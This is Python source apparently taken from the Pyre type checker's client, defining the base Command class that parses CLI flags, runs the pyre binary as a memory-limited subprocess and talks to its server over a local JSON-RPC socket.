from abc import abstractmethod
from typing import Iterable, List, Optional, Set # noqa
from .. import json_rpc, log, readable_directory
from ..analysis_directory import AnalysisDirectory, resolve_analysis_directory
from ..configuration import Configuration
from ..exceptions import EnvironmentException
from ..filesystem import remove_if_exists
from ..socket_connection import SocketConnection, SocketException
TEXT = "text" # type: str
JSON = "json" # type: str
LOG = logging.getLogger(__name__) # type: logging.Logger
class ClientException(Exception):
pass
class State(enum.IntEnum):
DEAD = 0
RUNNING = 1
class ExitCode(enum.IntEnum):
SUCCESS = 0
FOUND_ERRORS = 1
FAILURE = 2
BUCK_ERROR = 3
# If the process exited due to a signal, this will be the negative signal number.
SIGSEGV = -signal.SIGSEGV
class IncrementalStyle(enum.Enum):
SHALLOW = "shallow"
TRANSITIVE = "transitive"
FINE_GRAINED = "fine_grained"
def __str__(self) -> str:
return self.value
class ProfileOutput(enum.Enum):
TRACE_EVENT: str = "trace_event"
COLD_START_PHASES: str = "cold_start_phases"
INCREMENTAL_UPDATES: str = "incremental_updates"
def __str__(self) -> str:
return self.value
class Result:
def __init__(self, code: int, output: str) -> None:
self.code = code
self.output = output # type: str
def check(self) -> None:
if self.code != ExitCode.SUCCESS:
description = ":\n{}".format(self.output) if self.output else ""
if self.code == ExitCode.SIGSEGV:
description += (
"\nThis is a Pyre bug. Please re-run Pyre with --debug "
"and provide the output to the developers."
)
raise ClientException(
"Client exited with error code {}{}".format(self.code, description)
)
def typeshed_search_path(typeshed_root: str) -> List[str]:
search_path = []
typeshed_subdirectories = ["stdlib", "third_party"]
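    # typeshed (as laid out at the time) keeps stubs under <root>/stdlib/<version>/
    # and <root>/third_party/<version>/, where <version> is e.g. "2and3", "3" or
    # "3.7"; the loop below flattens that into an ordered search path, preferring
    # newer versions and skipping Python-2-only directories.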
for typeshed_subdirectory_name in typeshed_subdirectories:
typeshed_subdirectory = os.path.join(typeshed_root, typeshed_subdirectory_name)
if (
not os.path.isdir(typeshed_subdirectory)
or typeshed_subdirectory_name == "tests"
or typeshed_subdirectory_name[0] == "."
):
continue
# Always prefer newer version over older version
version_names = reversed(sorted(os.listdir(typeshed_subdirectory)))
for version_name in version_names:
# Anything under 2/ or 2.x is unusable for Pyre
if version_name.startswith("2") and version_name != "2and3":
continue
search_path.append(os.path.join(typeshed_subdirectory, version_name))
return search_path
def _convert_json_response_to_result(response: json_rpc.Response) -> Result:
if response.error:
error_code = ExitCode.FAILURE
else:
error_code = ExitCode.SUCCESS
return Result(output=json.dumps(response.result), code=error_code)
def executable_file(file_path: str) -> str:
if not os.path.isfile(file_path):
raise EnvironmentException("%s is not a valid file" % file_path)
if not os.access(file_path, os.X_OK):
raise EnvironmentException("%s is not an executable file" % file_path)
return file_path
class Command:
NAME = "" # type: str
_buffer = [] # type: List[str]
_call_client_terminated = False # type: bool
_exit_code = ExitCode.SUCCESS # type: ExitCode
_local_root = "" # type: str
def __init__(
self,
arguments: argparse.Namespace,
configuration: Configuration,
analysis_directory: Optional[AnalysisDirectory] = None,
) -> None:
self._arguments = arguments
self._configuration = configuration
self._debug = arguments.debug # type: bool
self._enable_profiling = arguments.enable_profiling # type: bool
self._enable_memory_profiling = arguments.enable_memory_profiling # type: bool
self._sequential = arguments.sequential # type: bool
self._strict = arguments.strict or (
configuration and configuration.strict
) # type: bool
self._additional_checks = arguments.additional_check # type: List[str]
self._show_error_traces = arguments.show_error_traces # type: bool
self._verbose = arguments.verbose # type: bool
self._hide_parse_errors = arguments.hide_parse_errors # type: bool
self._logging_sections = arguments.logging_sections # type: str
self._capable_terminal = arguments.capable_terminal # type: bool
self._log_identifier = arguments.log_identifier # type: str
self._logger = arguments.logger or (
configuration and configuration.logger
) # type: str
self._log_directory = arguments.log_directory # type: str
self._original_directory = arguments.original_directory # type: str
self._current_directory = arguments.current_directory # type: str
if arguments.local_configuration:
self._local_root = (
arguments.local_configuration
if os.path.isdir(arguments.local_configuration)
else os.path.dirname(arguments.local_configuration)
)
else:
self._local_root = arguments.original_directory
self._analysis_directory: AnalysisDirectory = (
analysis_directory or self.generate_analysis_directory()
)
@classmethod
def add_arguments(cls, parser: argparse.ArgumentParser) -> None:
parser.add_argument(
"-l", "--local-configuration", type=str, help="Use a local configuration"
)
parser.add_argument(
"--version",
action="store_true",
help="Print the client and binary versions of Pyre.",
)
parser.add_argument("--debug", action="store_true", help=argparse.SUPPRESS)
parser.add_argument("--sequential", action="store_true", help=argparse.SUPPRESS)
parser.add_argument("--strict", action="store_true", help=argparse.SUPPRESS)
parser.add_argument(
"--additional-check", action="append", help=argparse.SUPPRESS
)
parser.add_argument(
"--show-error-traces",
action="store_true",
help="Display errors trace information",
)
# Logging.
parser.add_argument(
"--output", choices=[TEXT, JSON], default=TEXT, help="How to format output"
)
parser.add_argument(
"--verbose", action="store_true", help="Enable verbose logging"
)
parser.add_argument(
"--enable-profiling", action="store_true", help=argparse.SUPPRESS
)
parser.add_argument(
"--enable-memory-profiling", action="store_true", help=argparse.SUPPRESS
)
parser.add_argument(
"-n",
"--noninteractive",
action="store_true",
help="Disable interactive logging",
)
parser.add_argument(
"--hide-parse-errors",
action="store_true",
help="Hide detailed information about parse errors",
)
parser.add_argument(
"--show-parse-errors",
action="store_true",
help="[DEPRECATED] Show detailed information about parse errors",
)
parser.add_argument(
"--logging-sections", help=argparse.SUPPRESS # Enable sectional logging.
)
parser.add_argument(
"--log-identifier",
default="",
help=argparse.SUPPRESS, # Add given identifier to logged samples.
)
parser.add_argument(
"--log-directory",
help=argparse.SUPPRESS, # Override default location for logs
)
parser.add_argument(
"--logger", help=argparse.SUPPRESS # Specify custom logging binary.
)
parser.add_argument("--formatter", help=argparse.SUPPRESS)
# Link tree determination.
buck_arguments = parser.add_argument_group("buck")
buck_arguments.add_argument(
"--target", action="append", dest="targets", help="The buck target to check"
)
buck_arguments.add_argument(
"--build",
action="store_true",
help="Freshly build all the necessary artifacts.",
)
buck_arguments.add_argument(
"--use-buck-builder",
action="store_true",
help="Use Pyre's experimental builder for Buck projects.",
)
buck_arguments.add_argument(
"--use-legacy-builder",
action="store_true",
help="Use Pyre's legacy builder for Buck projects.",
)
buck_arguments.add_argument(
"--buck-builder-debug", action="store_true", help=argparse.SUPPRESS
)
source_directories = parser.add_argument_group("source-directories")
source_directories.add_argument(
"--source-directory",
action="append",
dest="source_directories",
help="The source directory to check",
type=os.path.abspath,
)
source_directories.add_argument(
"--filter-directory", help=argparse.SUPPRESS # override filter directory
)
parser.add_argument(
"--use-global-shared-analysis-directory",
action="store_true",
help=argparse.SUPPRESS,
)
parser.add_argument(
"--no-saved-state",
action="store_true",
help="Don't attempt to load Pyre from a saved state.",
)
# Handling of search path
parser.add_argument(
"--search-path",
action="append",
default=[],
type=readable_directory,
help="Add an additional directory of modules and stubs to include"
" in the type environment",
)
parser.add_argument(
"--preserve-pythonpath",
action="store_true",
default=False,
help="Preserve the value of the PYTHONPATH environment variable and "
"inherit the current python environment's search path",
)
parser.add_argument(
"--binary",
default=None,
type=executable_file,
help="Location of the pyre binary",
)
parser.add_argument(
"--buck-builder-binary",
default=None,
help="Location of the buck builder binary",
)
parser.add_argument(
"--buck-builder-target", default=None, help=argparse.SUPPRESS
)
parser.add_argument(
"--exclude",
action="append",
default=[],
help="Exclude files and directories matching this regexp from parsing",
)
# Typeshed stubs location
parser.add_argument(
"--typeshed",
default=None,
type=readable_directory,
help="Location of the typeshed stubs",
)
parser.add_argument(
"--save-initial-state-to",
default=None,
help="Path to serialize pyre's initial state to.",
)
parser.add_argument(
"--load-initial-state-from", default=None, type=str, help=argparse.SUPPRESS
)
parser.add_argument(
"--changed-files-path", default=None, type=str, help=argparse.SUPPRESS
)
parser.add_argument(
"--saved-state-project", default=None, type=str, help=argparse.SUPPRESS
)
# Temporary flag to help migrate to json sockets for incremental and query
# commands.
parser.add_argument(
"--use-json-sockets",
action="store_true",
default=False,
help=argparse.SUPPRESS,
)
@classmethod
def add_subparser(cls, parser: argparse._SubParsersAction) -> None:
pass
def generate_analysis_directory(self) -> AnalysisDirectory:
return resolve_analysis_directory(self._arguments, self._configuration)
def run(self) -> "Command":
self._run()
return self
def exit_code(self) -> int:
return self._exit_code
@abstractmethod
def _run(self) -> None:
""" Abstract method expected to be overridden by subclasses. """
pass
def _flags(self) -> List[str]:
flags = []
if self._debug:
flags.extend(["-debug"])
if self._sequential:
flags.extend(["-sequential"])
if self._strict:
flags.extend(["-strict"])
if self._additional_checks:
flags.append("-additional-checks")
flags.append(",".join(self._additional_checks))
if self._show_error_traces:
flags.append("-show-error-traces")
if self._verbose:
flags.append("-verbose")
if not self._hide_parse_errors:
if self._logging_sections:
self._logging_sections = self._logging_sections + ",parser"
else:
self._logging_sections = "parser"
if not self._capable_terminal:
# Disable progress reporting for non-capable terminals.
# This helps in reducing clutter.
if self._logging_sections:
self._logging_sections = self._logging_sections + ",-progress"
else:
self._logging_sections = "-progress"
if self._logging_sections:
flags.extend(["-logging-sections", self._logging_sections])
if self._enable_profiling:
flags.extend(["-profiling-output", self.profiling_log_path()])
if self._enable_memory_profiling:
flags.extend(["-memory-profiling-output", self.profiling_log_path()])
if self._enable_profiling or self._enable_memory_profiling:
# Clear the profiling log first since in pyre binary it's append-only
remove_if_exists(self.profiling_log_path())
if self._current_directory:
flags.extend(["-project-root", self._current_directory])
if self._log_identifier:
flags.extend(["-log-identifier", self._log_identifier])
if self._logger:
flags.extend(["-logger", self._logger])
if self._log_directory:
flags.extend(["-log-directory", self._log_directory])
return flags
def _read_stdout(self, stdout: Iterable[bytes]) -> None:
self._buffer = []
for line in stdout:
self._buffer.append(line.decode())
def _read_stderr(self, stream: Iterable[bytes]) -> None:
buffer = None
log_pattern = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} (\w+) (.*)")
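        # The binary's stderr lines look roughly like
        #   "2019-06-30 12:34:56 PARSER some message"
        # so group 1 is the logging section and group 2 the message; non-matching
        # lines are treated as continuations and appended to the current buffer.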
try:
for line in stream:
if self._call_client_terminated:
return
line = line.decode().rstrip()
match = log_pattern.match(line)
if match:
if buffer:
buffer.flush()
buffer = log.Buffer(
section=match.groups()[0], data=[match.groups()[1]]
)
elif buffer:
buffer.append(line)
if buffer:
buffer.flush()
except Exception:
pass
def _call_client(self, command: str, capture_output: bool = True) -> Result:
if not os.path.isdir(self._analysis_directory.get_root()):
raise EnvironmentException(
"`{}` is not a link tree.".format(self._analysis_directory.get_root())
)
client_command = [self._configuration.binary, command]
client_command.extend(self._flags())
client_command.append(self._analysis_directory.get_root())
def limit_memory_usage() -> None:
try:
limit = 20 * 1024 * 1024 * 1024 # 20 GB
resource.setrlimit(resource.RLIMIT_DATA, (limit, limit))
except OSError:
# Run the process with unlimited memory if the underlying syscall fails.
pass
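        # limit_memory_usage runs in the forked child (via preexec_fn below) before
        # the pyre binary is exec'd, so the 20 GB RLIMIT_DATA cap applies only to
        # the type-checker process, not to this client.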
LOG.debug("Running `%s`", " ".join(client_command))
with subprocess.Popen(
client_command,
stdout=subprocess.PIPE if capture_output else None,
stderr=subprocess.PIPE,
preexec_fn=limit_memory_usage,
) as process:
# Read stdout output
if capture_output:
stdout_reader = threading.Thread(
target=self._read_stdout, args=(process.stdout,)
)
stdout_reader.daemon = True
stdout_reader.start()
# Read the error output and print it.
self._call_client_terminated = False
stderr_reader = threading.Thread(
target=self._read_stderr, args=(process.stderr,)
)
stderr_reader.daemon = True
stderr_reader.start()
# Wait for the process to finish and clean up.
process.wait()
# In the exceptional case, make sure that we print the error messages.
if process.returncode != 0:
stderr_reader.join()
self._call_client_terminated = True
if capture_output:
# pyre-fixme: stdout_reader is not always declared!
stdout_reader.join()
output = ""
if capture_output:
output = "".join(self._buffer)
if process.returncode != 0 and capture_output:
output = "".join(self._buffer)
return Result(code=process.returncode, output=output)
def _relative_path(self, path: str) -> str:
return os.path.relpath(path, self._original_directory)
def _state(self) -> State:
pid_path = os.path.join(self._log_directory, "server/server.pid")
try:
with open(pid_path) as file:
pid = int(file.read())
os.kill(pid, 0) # throws if process is not running
return State.RUNNING
except Exception:
return State.DEAD
# will open a socket, send a request, read the response and close the socket.
def _send_and_handle_socket_request(
self, request: json_rpc.Request, version_hash: str
) -> None:
try:
with SocketConnection(
self._configuration.log_directory
) as socket_connection:
socket_connection.perform_handshake(version_hash)
socket_connection.send_request(request)
response = json_rpc.read_response(socket_connection.input)
result = _convert_json_response_to_result(response)
result.check()
self._socket_result_handler(result)
except (
SocketException,
ResourceWarning,
ClientException,
json_rpc.JSONRPCException,
) as exception:
LOG.error("Error while waiting for server: %s", str(exception))
LOG.error("Run `pyre restart` in order to restart the server.")
self._exit_code = ExitCode.FAILURE
# Will be overwritten in subclasses to specialize how json socket
# responses are handled.
def _socket_result_handler(self, result: Result) -> None:
log.stdout.write(result.output)
def profiling_log_path(self) -> str:
return os.path.join(self._log_directory, "profiling.log")
@property
def analysis_directory(self) -> AnalysisDirectory:
return self._analysis_directory
|